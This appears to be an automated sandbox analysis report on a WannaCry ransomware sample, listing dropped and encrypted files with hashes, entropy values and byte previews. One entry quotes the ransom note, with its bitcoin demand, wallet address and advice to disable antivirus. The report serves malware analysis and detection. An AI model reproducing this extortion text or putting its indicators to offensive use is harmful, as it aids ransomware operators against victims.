                                                  C:\Users\user\AppData\Local\Temp\8.WNCRYT (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.817605082713292
                                                  Encrypted:false
                                                  SSDEEP:24:xzvtkgYX+wiIJbG6qKt5tQlRVJS6iv5th/WuBLHvDrCh:ltZYX9NJKs5tQlJgv5OYLPDrC
                                                  MD5:F94BD89856E27CBBBF1DDCC317404C20
                                                  SHA1:7A93781DF0A0EEF593F2133A67501D3B8B6E129D
                                                  SHA-256:126E54C6D209DD003123DD62EDF4236C98C9F39D3C459FED68FD32ACE4D1C30F
                                                  SHA-512:C96035E03B44E67B29E3874AD356966C82370814884757BFC0A1A713355F38C381E3307B12EF1BC0160F8E00428CF750B90A9765A63E9EDCE6625339B7DBFE84
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.V<..X.!.2h.H...R.a.....B.K\.?..V.....q.Ns....<C.}C./. .....JF.z=.b.0..G.............QD.....6...\..H..\.?m...E..dfo..O..D......(4|Y&T.._9....(/.dg..kn'U..N..F.Au.&..1dYq)./).....k.+.V...t..;(.'5..-.q...X.j.A.[oD..[|.j(.Up.1S@..Bn..~....w..F..s..J..L|...."..-....9.Wz/<.}.a..w..st....X.$...u..B.~....H(x..8.......9.....I..h.Dk.|....t+....<......O.J.C.m...'.&..[h...,..B.....a.....?W.#.c.uB..M.....T..4..wY_gi........qX........_.t..W..3$!.q.d.............c;w.j.j.`.E....<@.........)&..y.-...[}..6...PZ...`.8.....^.`..]..$....d.0.g.{+U..m.7...g7...`.......2.j...u.....`....j.~;...HCWpB...H...x.eNf..H.m2i.._......?...|.dIm.o...m.?.M6....*...'....iG.....d5...qW.t..5d.hM...F......W.R..!..d...Y.`...c.'.!.........y...)b....E..._.Ha.km%@V..K)Xf...7o#...m...up..G.:.T.Q..Ow)..%L')...O...9.i..........*.....$?...*....Y....]H>?.v(....c......:u..vu.';ik.........f$t....i.P.2.......~...T].=l..jn.....v.@'..U.d.n8af.....&}..........7.Vy.n...u......./....$}...R

                                                  C:\Users\user\AppData\Local\Temp\9.WNCRYT (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.803014480113174
                                                  Encrypted:false
                                                  SSDEEP:24:BK5mPTbhtiACDzIWISa9AqT0M9e42DOvvXBLKCxssQDHMQJGNs1tZPDR:BxbeACV+r0M9aDOvvXg2srrqs1PDR
                                                  MD5:349859A88A857CFEB5FA48B327DA598E
                                                  SHA1:B7245ED8862C33448A8489C0FA7C45F9FCE41554
                                                  SHA-256:C6C6791EF6689A9EB59CD1CD183469AF4F7CDEB6A01C450F0F9968A67D4F0932
                                                  SHA-512:F0C0F09675339DDC2EC6E36EA59F8B101E43211AAF6B1F861A446D4C80B6B8A081034F6B798B6BCA4B89B3D42E247ED4106BA6EB310BAA960D55B776CA0B0893
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.B...>.+..H}a..$`.*.....'.....0._;)%-....x5../;......\@?..TS....v...g^.`;...7.......H7.......5<.f-#.>K`...D`'....V8....]..ed...\.v.L.y..bUf.w...;...b.S..;...x...e..}CW..bO..............h ....V.y.P....%(.V*RYF.r]R..wNO......M;.F...L.......8...o...c.0.v....V..L.... }rp ...p..4]}'...$...@.v....r.Q.P...R'T<`....!4.,...C..R.j.......DH...m8U..........J.d.......H..9..Jkt.A...j....U...rh).J...[.._..x...6:..JA=4l..........4uC...5...T.m.!.Y...@x+K..x2c_...%g.0....`....K!.T.!oP..mmD..?4=..ZG.....`..>.t.8..i.....v.'(.N.=4v.E.....\....I.3....{.D.G..c.......\'_.yo.:..C...........T...._......}/...v...O.q".....6..N.b....?.r.W.&f...f..Wx6....h..2j<.D...S.zk..Y........r..x.D).AC..y.?E$..+.J..........#jTlb.p...K..p.g.]*..Y..4RU.M...f$.....s..Fa<.....R_Z).H.,....JA..8.H.1.}.....M^...A....-.+......A8FA.\...V9w..F*%=+.%q..E..,......+.p....E...._...F......x..U...=....Z.d..r...L|.cp..s....e}........T.w.c.k.%n..%..%b|.........F....d5X...E.}.9G.k........5u7.M

                                                  C:\Users\user\AppData\Roaming\Microsoft\Templates\@Please_Read_Me@.txt

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):933
                                                  Entropy (8bit):4.708686542546707
                                                  Encrypted:false
                                                  SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                                  MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                                  SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                                  SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                                  SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

                                                  C:\Users\user\AppData\Roaming\Microsoft\Templates\@WanaDecryptor@.exe.lnk

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon May 15 07:29:01 2023, mtime=Mon May 15 07:29:01 2023, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
                                                  Category:dropped
                                                  Size (bytes):577
                                                  Entropy (8bit):5.195403137227408
                                                  Encrypted:false
                                                  SSDEEP:12:8BiXpzYNbfIhUV9nzUoBjAzodwSY+GGY+GlmCt:8BzqhEZAS1TGGTGlm
                                                  MD5:AA6944E5A685F01614D23396940EDB50
                                                  SHA1:78E8BF9C092559F147E90E6222715CDF2B094048
                                                  SHA-256:636345AD7C515F5814FE1A1A7F8FD8F416536760B1947739E29DACE712AFA005
                                                  SHA-512:B5F30DF5E81368BE91278EDA05CD9A5C708142818E63130A719E5691022CAB32F5C37F41DEBA8E2B7EDBBD8EA8A67A75E2FF842DE2C3E428CC944E970332449A
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:L..................F.... .....kM......kM.....X.H.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._....b.M....:..M......t.2......J.. .@WANAD~1.EXE..X......V.C.V.C.....b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y.............5*.....C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226546..............n4UB.. .|..oT..9.......P..#.....n4UB.. .|..oT..9.......P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............

                                                  C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM01840907[[fn=Equations]].dotx.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):52120
                                                  Entropy (8bit):7.995400891648336
                                                  Encrypted:true
                                                  SSDEEP:768:LjFvp8L5WzZZ+oSSn2z0J3G/PhaIgu++mp+nOR7V6tyRBV736r+0clhmzrH034Ur:LjFRm5KydSnC0J3GJmM0EtgK+0cTO0nr
                                                  MD5:B29FE62550084DD5AD0B39BAA4780877
                                                  SHA1:555626E3213D9269FF11063BE061E597111F8646
                                                  SHA-256:8FB1303BB9570FBE3D7B6967FDAD5D93CF39670E999F79BFC3205194ED094232
                                                  SHA-512:CF6CE46EE6E6501730A39260661983C93A9F7AC0EE0040F1ED382800D3DA6C94322F3F1E27A138AA78D389085C4C711320F2A524004DA5AEE7DC82F771172CCD
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!....2 .?.+:...F;..Rv.,..{B....M\F.".Cb..:..B.e3..j(....>.CFO.......0m.;...${gJp.'.../..3+...B.w.....~....#..dA...x...V....-....#.K...._B.....q..^.mMl.V...|...M<...6,.N.*'..s...dy....o..R?...@....M.......W".CN...ZA..1|..Z`..7...bA...v`....Ue8n.1...B.o..5....r...........~.[.h@........\..D.m.e.I.y..hz....e...>....1.@...^.w..o.Pn. ..m.r...5.....q.h..u..e.4..YA..T....(<}Y.\...-V..Z.....~#8......V.%..w.........|..^%.`.h\.|..c.......1.7.....T....bp...8M.....O._'.w"........I..1.d8.E.%.3O....2...}......G!.w.Jd...I..b..Oo...P......6....!...Y.3.......m.....T/q.py.0..7.tDo{.~..r...7.k!..x..R@.^..U..r<&'.F.#:t.v...N.rp.q......pv......B...`.Ij..}.X,I.DX.Df4../_..1<..^...]4...........d..2..l....s......&a.....y..Z..&b.0.1..r_m..sU5Ae....%%....=....g*..D.......23..l:?eT..|)k..*).4).].>.&Q.^...7..7.+.........j|Et wdj....1...1..%x...iv.....[....=.H.<5.Z...aQ3.r....x..dJ...;].+.u...%.....u...J.'.....*.2.<f...b&....tof...b..F)e..7Z....~%.b.C}.@.-C...t....t

                                                  C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835233[[fn=Text Sidebar (Annual Report Red and Black design)]].docx.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):47576
                                                  Entropy (8bit):7.995573128949923
                                                  Encrypted:true
                                                  SSDEEP:768:nxSYRE9wQiDKzvwnIw9PXoAjpIUITVjsfcZdWuY849gtHePXeCBZGlsw7:nxSYRywQiD+gNYAKfFsfidWuY/EePuGC
                                                  MD5:7AE06D3A2A33129BE655F73DFE1EEE25
                                                  SHA1:FC308CB65908EC76565753C1F2CBBE8FD4C0D657
                                                  SHA-256:5DDB2D4CDC55877DF22C81133810CBE2B4EF5D20C0893E34BB98B8C1233B3DBF
                                                  SHA-512:D65C28EEDF6B886DC0DD742EAE979C0240B3057EBAF04A98C9D34CF8C22B5883C1BA3D08DB590CF5C51AD99280AD7BA22AE46C8145022C938AB209A4A45C4F5A
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!....8.\.%...8....7.E.'6..JG\....>9G..c.2.`..f......~...(m......J.|....{.G..Eb....P|.....Ec...6..A...O.9bl.@...d.P......'U?\C...*.....3.#h...KA.!.[.W.*...7a.%.D.^v..3u>.6.Jp..M).F].J.Sw..c...;.lw...n...e"...y..,..U.......z.5.|.K)..D..1.uIN.M.....%...q.H.............j... .5(.-.u...U>u....f@H.k.w...5E.r....9..h.L.m/.......3..a.m....#...S..X..9U....9...B5.~...kt.z...B..g.M..|5.r...e..A..[...O..%|W...2.!xR.P.+....(...cb..z..2.@.G)s.a.ib.2...c.k.].....;i....{.....iN..K.>....-A...S..hq...#$"l...(....a..IL...`.m.*|.1R/F.Cu....N....WO...t.....B?.l.j.C....Hu..i...........d.&...4.;s.....*.....|.K,.x....v%...J.=.,Yy.o...C}-&.. .....L.OC..@ ..ER.WV=x wd/.i_1..md.......F&..p;!..^.;..n...4z4..Hv6..nP.;~...d?.y...W~J..@+....S...9............3:.6..-."=.,,.u..QY"..Y...k~m.6.|.@.........t[..........J./..{LB...b.d:./...BX......1M[.S.B.(..<..TH.&E`/....(.....*5.,.......k.Rv..F.D...(..!.........Y....H......`...Ep......~.ow..v.S#2.;$.3....<H.J..U.r@..S..Bs..G...

                                                  C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM03998158[[fn=Element]].dotx.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):34696
                                                  Entropy (8bit):7.994205797141632
                                                  Encrypted:true
                                                  SSDEEP:768:TXmhCQTbQD3pEVtX/USxQI2b5tX9iuRIqtqQXJIqDunl3vb2:VRD3pETX8SxQhFbJRIqtvZTDunl/b2
                                                  MD5:7396C7FF02CA01990B2589873A21588A
                                                  SHA1:50C6A9C42EEBF12C469DCD81F5F08A772917138C
                                                  SHA-256:DE3642807DE72A677E5F616A7ABB716285812C088049B72AC2D2FD08F960A247
                                                  SHA-512:F75FF13B0DA5901CEDCDF53751F8F9F63A014FBAD9C54D61458F1954A6A012F77E63F5EEFAD13A7B9F4659445E7A2744384388FE4FA1D2690E18705065B1D040
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!....>+_.UG.......cg.=LL.; ...S..J..E!..nE:.{....CaW'.!=u.j`4.I.?.".\....T}a..z..-..'X+.......B...s..<t....Ln1..4J#...e......b......@....q..M.....`.....7n.a..ot..b9.F.]#...o..m.=.......J._....&...^.=$47....lx......f...M.T..........6...1N...6..'8.<....o...........iAT...2....CU0....l.N.../.F..,-.x8..\....p.j.pWe.}.&.m.T..6}.71.}./^3..3...U......g6........"............^R...<.[P^G.0.G-....Ek.....f...t..J...r....S...:....O>~KL +....p....k...yo.......CE..x'.6.h.?4.m.H:.K..Q....&+.Cl%.h.....9,...}y9>qD..?..[.I..^.x.q..z".}.-..{.X.t|z.".)....n.....5#E5......`...I.63..k..-.....l3.1...i...iiQ...w(....%(].|jv..m}N.+{gNm...#K..M......rmi..~.6lT.j....9.....4xm"....f..q...a..(..3eI].x....F..(......?M\9'Q$K6j.......5..=?".1..h..&^../..h....].%...~......X9u?o.e`..5u....=[...;S.x....U>..1n..>...[.].1...^..k.......*.x....P...@...^#......b.....V...... ;.1F.C.>..:..m..l.=.Q..[.......U.....7..p.Fs..I.b.( o.@..b......>.K.:;Z....../r..P..oM./...9.m..

                                                  C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM03998159[[fn=Insight]].dotx.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):3465368
                                                  Entropy (8bit):7.999943059525333
                                                  Encrypted:true
                                                  SSDEEP:98304:YIqOD1vIgttPdhU98VKLa1FXvH9hy3JBs5e2:c/mHvH9hys42
                                                  MD5:AA25078E1190434D4E1E2376B2749511
                                                  SHA1:7C71BD343887C131CD05C588A19A221632CE70AF
                                                  SHA-256:49718EC2C72D1C4F811F7A9946B46E5B5BA0EDE851CCA6C3FB1BBF79530B81CC
                                                  SHA-512:2A23FA29B1887909542CF1EA22AF14C3F87C085EFDCEC23E76FC9D3F61A0F9CA46DA424A5387914AB4238D302F6BE5F7AEF7CF74F2D939D9ED20388CDCC349CA
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!.......I."~.1.......z....3..C$..d.....pc..fh.%.f>...Vr.]'."...@1..H.^.....J..RN.,lC.\&.Ct...dk..{.a.w.....J.#`W.@.Of..Y...|g\...#...X.......oq.HLX...$NJ(.y.|..a!E.N.K@.y......e...m..ea,.4..:.....Gy+..C...V..8.d.^....t..,....;..".XC..&....#>..$.U......t.4.....3g...-....&......J..>..y^.Le7l xs`:{q.F:ZS....B...ED.\..\.Z*....n......7.....m.......~:..h...._o....<.@.^c.u...t...>..?h....a..Pw......(.J,I.\^E._{N..N..O.g......J.........f....;....4..Gl d....iJ.eF..D.}/..MM}..4..)}4...8..(.3....H..Y......%...K...[..&'...Nk.#^/..>.%......|.V... ..".....m..Nw.>.r2\[[...K........@..8I...{......M.y..n...&.."B...G.]64...;C......t..(.D.=.......U.#.%...9.............p....\...._..)..9'=<.k&....}...-4....j... .&.4p.ls@.Sr....xr..S.BoX.....Q.9[.8_.y.j5.5.v.NB!..{.I.\V.?.......i...l..#.%.%H.3Q..g.<..a\.n..#.x...o.9.6..X\...n(.;..(S..Y.!.U.l.w4...\\.C.a....V...DS.%...O..e.4.u..#W..i.8E....n...$a.}....tW-..Y....V.C.......r..TU.(:..0..&'...+^F.lY....LC...

                                                  C:\Users\user\AppData\Roaming\Microsoft\Templates\Normal.dotm.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):19560
                                                  Entropy (8bit):7.991001275362301
                                                  Encrypted:true
                                                  SSDEEP:384:e69hiEqjcKQEheyI6LPd66T0o8YhBq0g0tIQJnbjAPd07CnL7:e6WvIKQerICN0o8sfJnb0l07CL7
                                                  MD5:B43ACA41DA09FE072400736413330204
                                                  SHA1:A370D62ED8429CA84F8E3E1AB86D248B22450AC4
                                                  SHA-256:47C641E62BA0BE508F54ECEC57574ACCA0F0F3D25F1B30874F3F5713B5E857DB
                                                  SHA-512:38294CDD2A618C233043A867B90E398AEE327C0D7A13D70784E152B41C738E77653C7F34A94891DAE4D627F7F314165C00989D074835ABECC72CAF658B3D002A
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....m.).....2.D...ME.P......p..oT:.P.kr...fo...[E..m.p.s0...+.(.9Y.(0..$.CCIA.-`=.P..!.W.N..".u.V2.....C..A...g......3..pt.W.B.n.........zN.P'd=*LI....a....]|.B...l-Zo.}..$./.4..'...P.]=._.~.....W..v2@.o;|...._._..p?><.O1.N.Ti.`.$..>..o.~..l.t....GK......k*..".....3.~.j.......<8@).2....h.l.Jm.>[I....i.z...p.H.,HB|.{1.[D!8b...6.=_.6e...gR......](=..gX..>.5f.j9.}._..OM...jmXv.....1..>C..0o*.Y.}.i74...3/..........n...W.a....{."....J....3[...N.....#e2.>..r...v...#...wIJ....v12.4.i(...f.'.p....;"...9.._h...^N.W.&...?.9...X.{.oj...R.!..E._.V.t\..n-.9<...z..}L.g+..........]....Z.K.....7.h,....)......."..d.........O......d... ....T].j...I$...mv..../....a...Sg..P*.-...B.~...jI...P.X_2....p.U.U..0.1(.N.........w....q,...?7...C.W....;c..;.....c.Xh.N.eL...T..^.....(...1.K...._..iy...p........K...n...I.u.zk.M.......#.c..i.n./.b./S{.RN......J.c...\.36$.J.$..?B..=hou."M2.-...in..9C03..&.G/...$R)v..... ?c.......F...J....n.D.u.%....@.>(g. R..Zb!...Y.

                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AGWVMYQACF.jpg.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.84259899688765
                                                  Encrypted:false
                                                  SSDEEP:24:bki0AYEPN+e6HPqsB9dKqA9rMT4G+ZX6lbynTEOGRVEZrP1HTmZx4qSxiIgNi8Mw:bkBE1WNBSb9gmibyniVEZr1Tm74tg48B
                                                  MD5:26E1773DF0D57A0D5329EBCF799C64BA
                                                  SHA1:54015B652E0EE556962EA23A7B75791785FAEDC6
                                                  SHA-256:10961514909239FB8A548700823AFCFD85D9E59F9425A06B45B5AE21BA9EE31D
                                                  SHA-512:DD206089AE7156D2277338409C4A02B6CA3CFE59F987BF936D2E3D78572DD8A379CA8E99022238E380C2A2EBEB432E8B2AD9089AF6BB29B85AD7BB60A8172191
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!......>].KF....C...q..b...KP8*...a..'.w,.+^..c.[.li9X...+.G.Z......n*.]+H..[.=.u...!>6.4...9}.q.}`g..E...z...R..z.cim.#B..:.yXD1gyN...(..(&gL%.....`.....f....b.SS.D.j~.`3...H.|..P;wH..mY.........I.4J....O#.5...._.|g7UD]..B.F.>.o.V....?Y5..|...7|j................-.ykC......A.s.Wm....0U..$..s{w`.~.6....F.sU.H..J..C..x1MK.;..........rC.b...-$.)..?...(......R.....[.>.0)gQ.]0k.3.+m.V.A.....&N;.0...gIE=..QR.....)..H.q.(.'...v..........C.....Nf.....$..4.W4..~0.T.....J.C0Cn.~.!.....KF.x.e.{^..=...+~...Of.C.P....Y.fr...p...Q..%-.:.B.f..o......M4.../..EK.M......bZ+.d..J.'.>x..... >...8.;....!w.Znr.......TWT..#........c...t./.u..5.)..e....O.(...!5...a.3....;..Q...(.H.%{..IK.&....._...d.W]..i]...!...i.Z......b.S..By..VO..ra.w....N[../D...}.B.....^.0q.!,.j.L..K3../F..d..s..^..x9.7.l.:;.c......Yx*.h.b.$.?.h.0.#._&/9.-2.C...(.;_oM.O.5.o.w]..>!5..]....^I.r........>....<.....Q...1V...glY;...7t.t..!....4.m......Pa.).......|.]lZF'.qW.3.....?K.!..

                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AGWVMYQACF.mp3.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.849946121833623
                                                  Encrypted:false
                                                  SSDEEP:24:bkbQ5orf5ek2Cp9fskheSIZDujBw4G6d9hrZ1ykxcoJsY8au4S5PlwZLWf5TqK3y:bkU5ick99fsklIZKju4xp7BJdSllwMVI
                                                  MD5:9AEC771663FABE166A37488531D90238
                                                  SHA1:0D8ACB53B23D4EE4E652562A71B778215922BF42
                                                  SHA-256:13760FFDB4E67356D2632F618FCDD6B7795F3584FC3430C245AABE0CFDC0CD94
                                                  SHA-512:90A040D377EA7983CB3B431389805FA283DFDE6C1CACE756FC6D41C353CF07C0517FC1877E450013330DC79BB9D40405A756721206EF6275B76D00371750556E
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....EB.FC... ..w.2..j....]...\.w..8.....wR..a$..j...b<n.>8)..-].zM|.`.P..s..u.....F...,...I..;.. .Y..@..#.....f..G..j......F....y<......._.K.n....Kn@1........;aai"<.r....Bs..}...K...^.W.,...A.....X......h...~.......?.T..t5.aR..h....P\/.....{.,.G@I.............N...._Ebn.f.Q.n.p..C..o.@......b\cf...fjI."....=..\...J...0.......B........]..;8%i...b...Hu./X.(0..B..".V..#..w.N.......\6..l...\ZX...!].......g.>.^.>..nC .ld..R..W.(P...@...;..Bie..E.F/...H.r.a...c3......61`.w....(.....g.lFr..fI.....=Q.^.H......GP..ks%{..!A{.M.W.F.u......y ...ri.yC......mX.I.k.YJ....|.T.#.\..%+..-..{"....6XJ. [nz\yk..e..^.4=k.P...,.#..{7.PgWCR.^.~..h.*....(3.=.x6}..-.H.+A.G!.e..0n'u.m...f.X.J.1......._Z...W..h.I.zq.....Z..1.H.6..4J..\.eb......q..Q..J.....{L.....m...<.."%...../....k.9. '...19....l.0..(.y*8VF.Me....T..2....z.=.Wa:.K&(....&>.s..Pp.)..l...F}....D-.p#h.....[/..3.Hg...../.3...*.4....P+..Fg.....b.....O..t.rjC..Xh.....MQ....(....+cd'.%..3...q;.....W._Y

                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AQRFEVRTGL.jpg.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.860896880517714
                                                  Encrypted:false
                                                  SSDEEP:24:bkN3n3zjWVj+AtfRfhtUFjBBRBl+PAO/qrjTAn8uOmFiVPof5n:bkhnWEAttht81+d8f4vORiB
                                                  MD5:23F4EE5EB0D36FF8F48090D6DC5EB616
                                                  SHA1:2B01EAA57CB1D913B6D46E5E4A43032981DAF997
                                                  SHA-256:A41DF67A2D3E4D7B5EB05EC38B5FB98AB6DDB1F8CE5E073324A45A818CDF389B
                                                  SHA-512:3B67C7BD8BBD7493287D4F9FCFD4EBA3485EA969948AEDC782F236B2F50395AB398B87B7EEDD45D01F68EBC84F395839D01051968639B78AD13DC108FE24464C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....R....0.|.t.k..._......\6.'.?UN...$.R-....0..>.R...J.m..&..u..+r..An.zO...l=......i.OP...\%.SC.k3yT......}..%B|].........l.yQ*.......:....g./....9.fK.r' ...d...{(]..+V.[.7.8:......-#.(19..p.7...I....D..ZL.%.j)T[oUIp{...d.w...._....u....B5....2.=..W.O...............Z...Iw....f.`.+....*Z..3.8.'....x/...o.......>5=o.u.H.C..,. 4.8.j.3..@..DN.Z..(.j(.!...b...?..X.k......u....>.Ir....:.h;...a.s..7.....r..+-..^..g.G0.H....r.2j..!n.@v?Z..Y*.ILBeM....P. ..x:*^...k|..I.P1Y....wf.gh.Ep..,M:..m.j..G.Z[.\$k].m.r..@a.2.....0....Y . .i.I..KI5wI..s8.....N..b..u....l.B#g.@.<&~7..A.../...>.I}.0..Y7..z.l......V.L..\...,>sJ...g.a..=...L.7z....)S.Z..R..W..B..Z....>..A..P.r:+....+....;.X...[....o..D.5...1...j...4..!......f..}.'....c.&..?...4...K'9..WHFf....E.V..to`M.fi..c..V..8E{......E98.....wc.bL(7L...6.....+....f..}}<..|.J....M. .x....f#.....9... .+......e...zO.}.Q.".3o.6e....J...(E%.....tz3%.R.:............Y8...t.G-..e0..or..y9.P..o..aH..l....d

                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AQRFEVRTGL.xlsx.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.829347230978042
                                                  Encrypted:false
                                                  SSDEEP:24:bkicUDYnRFVR0V2MYt9NYGv1+e7KT9CIQUFoKp6wjFQuyRuXH:bkiV4vWAMYnNd+eU6U6O6qLXH
                                                  MD5:FC0BD4C904E73F1190969646CC27922D
                                                  SHA1:485B96E303525DE91637D83438667C7F5EE3011D
                                                  SHA-256:205168E635F759BDE8E388A25679729CFA5133AD75747B4B09302E365AED4D3A
                                                  SHA-512:34A226EEDD6CD87B927C6EBA0C99C5595B04F4AC9C46D765947063AAC0C1C4D7D8480B5B6FB9E62DD9099090CA25AEE938296B84FEB79CFA24AA900926F3B5C4
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....`.@..&.F....,:C..6O. U....O...s9...n....C.....scg..~.. :.....N....C..D....F.K.+.f..mF...R....e.V..u.~}M.{.f..i.x.JF..Z.Wz..Jb....>.....X\I..^:.......ZE]...3..N.T*b.(..[C.........s.a.b...'^...].,.g.y.....?].r..iW7-68M.b...OJF..M......F^...C..%................Pf..;......7H...QU..o[...B)...Z:.>qla..?u.xs.<.X.D|.9.]_K.a=v.X....($..Q^}P.p.%.7..K.~."..j3._..8.I.a....f..o...4kw...c=2....X....k....c...wm.....2.....0...;>.{..{....Z..WV..*..p...y.-...C..R..r.S...]:...dZ.Y.'.>.'......vOH....8.c........s.r...c^..\l..v......je.mtF.....W0.^.(.;W.c...e.7..?t...^."B.Ky...N.P....S.*..o..U....E.......y....jX ...GJ..o..xJ.......(......58$:..c.hgp.~.}.7....X..........".uNQ...c".E.......=.}.......#..+.......:0.....u.>....f....}.?.1...Y......>.v....n.,.3..u..v..i.V@.%....)0.w....nQ....Q....q2 ,./...r..nc.1S'ie#|...\#....._...z+/m .aM_aE. .,.....}uiQ..........\.>.O.x..QT.Z.wW..%pXo.a..P......u......)P...,..$...`*..0...`...=...H..j.?CW.#..9B.....

                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\BJZFPPWAPT.png.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.8331263339910535
                                                  Encrypted:false
                                                  SSDEEP:24:bkZN8yWxycHIESvdZuyuC+Wk2myu4xH/wVNd8qn/6jmpFi/X0vzoMOlfuPY72:bkZ8ycH2K94qyu+fO8q/CmrQ0vkMaGwq
                                                  MD5:713664DD4B267CF13123C279B171CF7E
                                                  SHA1:A2A07097E0129824226682BEAA3BE907A0B1971A
                                                  SHA-256:C7A05E07840C80C7E782A5FF2196C4E922CB8159AD91E059DCA0D302FD1DBD2D
                                                  SHA-512:8B9501C4179D9E49DAAC850975A707753D0DE4D4E777975DE6E005BFA205A98630C93584DCC91134EBF424C3AD32A9D90052D7BF3F9CCB238B31FA3B663B4BA9
                                                  Malicious:false
                                                  Reputation:unknown
